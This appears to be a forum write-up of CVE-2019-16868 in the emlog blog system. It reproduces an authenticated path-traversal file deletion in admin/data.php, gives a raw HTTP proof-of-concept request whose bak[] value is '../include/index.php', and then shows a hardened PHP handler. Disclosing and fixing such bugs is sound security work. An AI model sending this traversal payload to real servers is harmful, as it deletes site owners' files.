7wu1wm0 posted on 2024-10-3 18:45:45

CVE-2019-16868: emlog security vulnerability analysis and reproduction


    <div style="color: black; text-align: left; margin-bottom: 10px;">
      <h1 style="color: black; text-align: left; margin-bottom: 10px;">0x01 Introduction</h1>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">emlog is short for "Every Memory Log", meaning a log of small everyday memories.</p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">It is a free, open-source blog system built on PHP and MySQL, written for a single author or several authors working together, and it also serves as a general blog and CMS site-building platform.</p>
      <h1 style="color: black; text-align: left; margin-bottom: 10px;">0x02 Vulnerability analysis</h1>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Problem code</strong> - admin/data.php</p>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/0b65a8093ca64f17b063c18ca6e5c19c~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1728115202&amp;x-signature=TmN7u3JMrssKhimWByju6mFlXo8%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Reproduction steps</strong></p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Environment: emlog 5.3.1</strong></p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Log in to the admin panel and open /admin/data.php?action=dell_all_bak</p>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/8ee0c20e09ec43ccb97ac0ca1f39ea30~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1728115202&amp;x-signature=Rn6QG88nID7Z6xTc4F%2BkALnXNd4%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Intercept the delete request with Burp Suite</p>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/ca7f4f02883a407390debb0c312398e4~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1728115202&amp;x-signature=iBjsfwXazzsJ8F0QXAU6HQdBbT8%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Create an index.php file in the include folder</p>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/e170e71eae95429a9ebb943c54fa572c~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1728115202&amp;x-signature=myKsCg7UQ%2BeTfTYsIIpAwXnqqeA%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Set the value of bak[] to ../include/index.php</p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">A 302 response is returned, which indicates success.</p>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/eebb3e0d4727449b89505bb7b52507fd~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1728115202&amp;x-signature=lw77q8mijiA945VsQQYUEgO4jeg%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The index.php file in the include folder has been deleted.</p>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/093c41157cfc4d63b2d6a64060c6ac57~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1728115202&amp;x-signature=hy2z%2BSoKJgT0bcfcJLGkXL%2FErCY%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <h1 style="color: black; text-align: left; margin-bottom: 10px;">0x03 POC</h1>
      <pre style="font-size: 16px; color: black; text-align: left; margin-bottom: 15px;">Host: 127.0.0.1
Content-Length: 28
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://127.0.0.1/admin/data.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: page_iframe_url=http://127.0.0.1/metinfo/index.php?lang=cn&amp;pageset=1; pgv_pvi=3037471744; PHPSESSID=u91v66ktst9vrva3ueb6333kt2; EM_AUTHCOOKIE_WtaQDRqaTBRof8EENT0LY3HNhJzryEPL=admin%7C%7Ce4739a735508976ba1d54ac95a78be3b; EM_TOKENCOOKIE_55cd567609038eefc9aaa8c1c0e141e1=d0025af7e912a4cc8b114e2f6cda6597
Connection: close

bak%5B%5D=../include/index.php</pre>
      <h1 style="color: black; text-align: left; margin-bottom: 10px;">0x04 Remediation advice</h1>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">emlog is already aware of this vulnerability, and the maintainers are expected to release a patch shortly.</p>
    </div>
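The root cause above is that the delete-backups handler passes each bak[] entry to the filesystem without confining it to the backup directory, so a traversal value such as ../include/index.php deletes an arbitrary file. The following is an added example of what a hardened handler looks like (it is not emlog's own code; the backup directory location, the .sql extension of backup files and the function names are assumptions):

```php
<?php
// Added example, not emlog's code. Assumed: backups live in one directory
// and are plain .sql dumps; only bare file names inside it may be deleted.

// Resolve a user-supplied backup name to a real file inside $bakDir, or
// return null if it points anywhere else (e.g. "../include/index.php").
function resolve_backup_path(string $bakDir, string $name): ?string
{
    $base = realpath($bakDir);
    if ($base === false) {
        return null;                       // backup dir missing: nothing is deletable
    }
    // A backup name must be a bare file name: no slashes, no "..", no NUL byte.
    if ($name === '' || $name !== basename($name) || strpos($name, "\0") !== false) {
        return null;
    }
    // Allow-list the characters and the extension (".sql" is an assumption).
    if (!preg_match('/^[A-Za-z0-9_\-.]+\.sql$/', $name) || $name === '..') {
        return null;
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . $name);
    // realpath() follows symlinks, so re-check that the result is still
    // under $base before trusting it; a nonexistent file yields false.
    if ($full === false || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Hardened "delete selected backups" handler for a bak[] array like the one
// in the POC. Rejected entries are returned so the caller can log them: a
// rejected value containing "../" is the detection signature for this CVE.
function delete_backups(string $bakDir, array $requested): array
{
    $deleted = [];
    $rejected = [];
    foreach ($requested as $name) {
        if (!is_string($name)) {           // nested arrays in bak[] are not file names
            $rejected[] = $name;
            continue;
        }
        $path = resolve_backup_path($bakDir, $name);
        if ($path === null) {
            $rejected[] = $name;
            continue;
        }
        if (@unlink($path)) {
            $deleted[] = basename($path);
        }
    }
    return ['deleted' => $deleted, 'rejected' => $rejected];
}
```

With this check, the request in the POC would be answered with the entry listed under "rejected" and nothing removed; the deletion action should in addition keep requiring the admin session and the EM_TOKENCOOKIE CSRF token that the POC request already carries.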




7wu1wm0 posted on 2024-10-18 16:33:35

Thank you for the excellent comment; it gave me a new angle to think about.